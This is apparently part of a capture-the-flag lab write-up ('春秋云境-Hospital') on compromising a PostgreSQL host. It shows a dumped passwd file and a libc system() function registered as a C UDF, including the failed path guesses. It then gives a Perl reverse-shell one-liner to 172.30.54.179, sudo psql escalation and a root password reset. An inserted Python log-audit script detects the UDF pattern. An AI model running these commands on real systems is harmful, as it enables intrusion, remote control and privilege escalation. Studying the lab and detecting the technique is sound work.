[proxychains] Strict chain ... 38.55.99.145:7778 ... 172.30.54.12:3000 ... OK
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
uuidd:x:106:112::/run/uuidd:/usr/sbin/nologin
tcpdump:x:107:113::/nonexistent:/usr/sbin/nologin
ntp:x:108:115::/nonexistent:/usr/sbin/nologin
sshd:x:109:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
_chrony:x:110:121:Chrony daemon,,,:/var/lib/chrony:/usr/sbin/nologin
grafana:x:111:122::/usr/share/grafana:/bin/false
postgres:x:112:124:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# proxychains4 psql -h 172.30.54.12 -U postgres -W
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
Password:
[proxychains] Strict chain ... 38.55.99.145:7778 ... 172.30.54.12:5432 ... OK
[proxychains] Strict chain ... 38.55.99.145:7778 ... 172.30.54.12:5432 ... OK
psql (18.1 (Debian 18.1-2), server 8.1.0)
WARNING: psql major version 18, server major version 8.1.
Some psql features might not work.
Type "help" for help.

postgres=# CREATE OR REPLACE FUNCTION system(text) RETURNS int AS '/lib64/libc.so.6', 'system' LANGUAGE 'C' STRICT;
ERROR: could not access file "/lib64/libc.so.6": No such file or directory
postgres=# CREATE OR REPLACE FUNCTION system(text) RETURNS int AS '/lib/libc.so.6', 'system' LANGUAGE 'C' STRICT;
ERROR: could not access file "/lib/libc.so.6": No such file or directory
postgres=# SELECT lanname FROM pg_language;
lanname
----------
internal
c
sql
(3 rows)

postgres=# CREATE OR REPLACE FUNCTION system(text) RETURNS int AS '/lib/x86_64-linux-gnu/libc.so.6', 'system' LANGUAGE 'C' STRICT;
CREATE FUNCTION
postgres=#
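Added example, not from the writeup: a log audit that catches the CREATE FUNCTION ... LANGUAGE C pattern above, including the failed path guesses, by parsing a PostgreSQL server log written with log_statement = 'ddl'. The log lines are constructed and PG_LIBDIR is an assumed install path.

```python
"""Audit a PostgreSQL server log (log_statement = 'ddl') for C-language
functions bound to a shared object outside the server's own library directory,
the UDF pattern above.  Added example, not the writeup's code; the log lines
are constructed and PG_LIBDIR is an assumed install path."""
import re
from collections import Counter

PG_LIBDIR = "/usr/local/postgresql/lib"  # assumed; verify with `pg_config --pkglibdir`

# Constructed log lines, log_line_prefix = '%m [%p] %u@%d ' (not a real capture).
SAMPLE_PG_LOG = """\
2026-02-07 19:40:02.113 UTC [2301] postgres@postgres LOG:  statement: CREATE OR REPLACE FUNCTION system(text) RETURNS int AS '/lib64/libc.so.6', 'system' LANGUAGE 'C' STRICT;
2026-02-07 19:40:02.114 UTC [2301] postgres@postgres ERROR:  could not access file "/lib64/libc.so.6": No such file or directory
2026-02-07 19:40:09.501 UTC [2301] postgres@postgres LOG:  statement: CREATE OR REPLACE FUNCTION system(text) RETURNS int AS '/lib/x86_64-linux-gnu/libc.so.6', 'system' LANGUAGE 'C' STRICT;
2026-02-07 19:41:30.020 UTC [2290] app@postgres LOG:  statement: CREATE FUNCTION add_one(integer) RETURNS integer AS '$libdir/add_one', 'add_one' LANGUAGE C STRICT;
"""

STMT_RE = re.compile(
    r"^(?P<ts>\S+ \S+) \S+ \[(?P<pid>\d+)\] (?P<user>\S+) LOG:\s+statement: (?P<sql>.+)$")
CFUNC_RE = re.compile(
    r"CREATE\s+(?:OR\s+REPLACE\s+)?FUNCTION\s+(?P<name>[\w.]+)\s*\(.*?\)\s+RETURNS\s+\w+\s+"
    r"AS\s+'(?P<obj>[^']+)'\s*,\s*'(?P<sym>[^']+)'\s+LANGUAGE\s+'?C'?(?!\w)",
    re.IGNORECASE)


def object_is_trusted(obj: str) -> bool:
    """C functions belong under $libdir (or the real pkglibdir), never an
    arbitrary absolute path such as the system libc."""
    return obj.startswith("$libdir/") or obj.startswith(PG_LIBDIR.rstrip("/") + "/")


def find_rogue_c_functions(log_text: str) -> list:
    """Every CREATE FUNCTION ... LANGUAGE C whose object file is untrusted.
    Failed attempts count too (the ERROR above shows paths being probed until
    one exists), and only a superuser can run this statement at all."""
    findings = []
    for line in log_text.splitlines():
        m = STMT_RE.match(line)
        f = CFUNC_RE.search(m["sql"]) if m else None
        if f and not object_is_trusted(f["obj"]):
            findings.append({"ts": m["ts"], "pid": int(m["pid"]), "user": m["user"],
                             "function": f["name"], "object": f["obj"], "symbol": f["sym"]})
    return findings


def attempts_per_backend(findings: list) -> dict:
    """Repeated hits from one backend PID are the 'guess the libc path' signature."""
    return dict(Counter(f["pid"] for f in findings))


if __name__ == "__main__":
    hits = find_rogue_c_functions(SAMPLE_PG_LOG)
    for hit in hits:
        print(hit)
    print(attempts_per_backend(hits))
```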

Then get a reverse shell.

select system('perl -e \'use Socket;$i="172.30.54.179";$p=12345;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};\'');

/usr/local/postgresql/bin/psql can be run with sudo without a password.

https://gtfobins.github.io/gtfobins/psql/

Remember to change the password.

ALTER USER root WITH PASSWORD '123456';

Got root.


春秋云境-Hospital
http://example.com/2026/02/07/春秋云境-Hospital/
Author: Skyarrow
Posted on: February 7, 2026